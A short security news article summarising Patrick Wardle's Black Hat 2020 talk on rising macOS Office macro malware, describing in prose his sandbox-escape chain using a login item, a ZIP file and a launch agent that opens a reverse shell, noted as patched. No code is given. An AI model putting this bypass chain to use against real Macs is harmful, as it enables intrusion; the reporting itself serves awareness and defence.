Cyber security news for all


    Significant increase in attacks with macOS specific macro malware

    Security researcher Patrick Wardle has observed a significant increase in attacks with macOS specific macro malware. As he explained in his lecture on Wednesday at the Black Hat 2020 conference, Macs are becoming an increasingly popular target due to their increasing use. Especially in the business sector, for example among young start ups.

    Users Are Much Less Aware Of The Dangers

    Attacks with prepared Word documents are old hat on Windows systems. Most users have internalized typical rules of conduct to protect against harmful macro code, react suspiciously to e-mail attachments and as far as possible, refrain from activating and using macros in Office. In macOS, macro malware is hardly an issue and users are much less aware of the possible dangers.

    macro malware

    Self Developed Attack Strategy

    To clarify the risk, the researcher presented a self developed attack strategy that minimizes the required user interaction and even bypasses macOS protection mechanisms. Wardles attack technology no longer poses an acute danger to well updating users, as it should no longer work in the form described on systems with the current office and operating system version since last year. Nevertheless, it shows the basic attack options in a very clear manner.

    The malicious macro code can only be executed if the user clicks on enable. He named the macOS sandbox environment in which Microsoft Office runs the app authentication mechanisms. It can sometimes prevent the execution of malicious code following a sandbox outbreak, as further limitations of previous malware.

    Wardle’s macro code creates a login item, which is executed automatically when the user logs in and now outside the context of the sandbox. Wardle solved the remaining problem with the notarization along with the quarantine mechanism quite creatively: Instead of an executable, he placed a ZIP file as a login item. When the archive utility started, it was unpacked as a default handler and created a launch agent that could now start a reverse shell without triggering security mechanisms.

    Recent Articles

    Unclear cyber attacks that target Covid-19 vaccine campaign

    Security researchers have discovered some cyber attacks that are targeted against the delivery of vaccine against COVID. The targeted attacks began in 2 months...

    New malware called Egregor is on the rise

    New malware is on the rise. The Egregor malware has only been in active for 2 months, but it is already becoming apparent that...

    Anyone with a smartphone can become a victim of cyber-mobbing

    Cyber-mobbing is becoming a huge risk in the current COVID crisis. According to a study, almost 20 percent of students in Germany are exposed...

    macOS Trojans: Traces lead to Vietnam

    Security researchers have discovered a new macOS Trojans. Behind this could be a well known hacker group that has spied on Vietnamese dissidents in...

    Court forces Tutanota to perform a surveillance function

    Tutanota email only stores its user mails in encrypted form and cannot read them itself. Tutanota is one of the few email providers that...

    Related Stories

    Leave A Reply

    Please enter your comment!
    Please enter your name here

    Stay on op - Ge the daily news in your inbox